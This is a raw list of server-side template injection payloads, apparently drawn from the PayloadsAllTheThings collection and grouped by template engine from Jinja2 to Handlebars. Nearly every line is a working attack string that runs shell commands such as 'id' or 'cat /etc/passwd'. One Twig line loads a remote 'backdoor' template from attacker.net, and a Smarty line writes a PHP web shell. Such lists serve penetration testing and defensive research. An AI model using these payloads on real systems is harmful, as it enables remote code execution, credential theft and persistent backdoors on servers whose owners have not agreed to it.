# SSTI (Server-Side Template Injection) Payloads
# Source: PayloadsAllTheThings

# Detection Payloads
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
${{7*7}}
@(1+1)
{{7*'7'}}
*{7*7}

# Jinja2 (Python)
{{config}}
{{config.items()}}
{{self.__class__.__mro__}}
{{''.__class__.__mro__}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{ ''.__class__.__bases__[0].__subclasses__() }}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{_self.env.setCache("ftp://attacker.net:21")}}{{_self.env.loadTemplate("backdoor")}}

# Smarty (PHP)
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

# Freemarker (Java)
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
[#assign ex="freemarker.template.utility.Execute"?new()]${ex("id")}
${7*7}
<#assign cmd = "freemarker.template.utility.Execute"?new()>${cmd("id")}

# Velocity (Java)
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('id'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

# Thymeleaf (Java)
${T(java.lang.Runtime).getRuntime().exec('id')}
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("id")}
__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x

# Pebble (Java)
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('id') }}
{% set cmd = 'id' %}{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd).inputStream.readAllBytes() %}{{ (1).TYPE.forName('java.lang.String').constructors[0].newInstance(([bytes]).toArray()) }}

# Mako (Python)
<%import os%>${os.popen("id").read()}
<%import os; x=os.popen("id").read()%>${x}

# Tornado (Python)
{% import os %}{{ os.popen("id").read() }}
{%import os%}{{os.popen('id').read()}}

# Django (Python)
{{''.__class__.__mro__[1].__subclasses__()}}
{{ request }}
{% debug %}

# ERB (Ruby)
<%= 7*7 %>
<%= system("id") %>
<%= `id` %>
<%= IO.popen('id').readlines() %>

# Slim (Ruby)
#{ system('id') }
= system('id')

# Nunjucks/Mozilla (JavaScript)
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
{{constructor.constructor("return this.process.mainModule.require('child_process').execSync('id')")()}}

# Handlebars (JavaScript)
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').execSync('id');"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
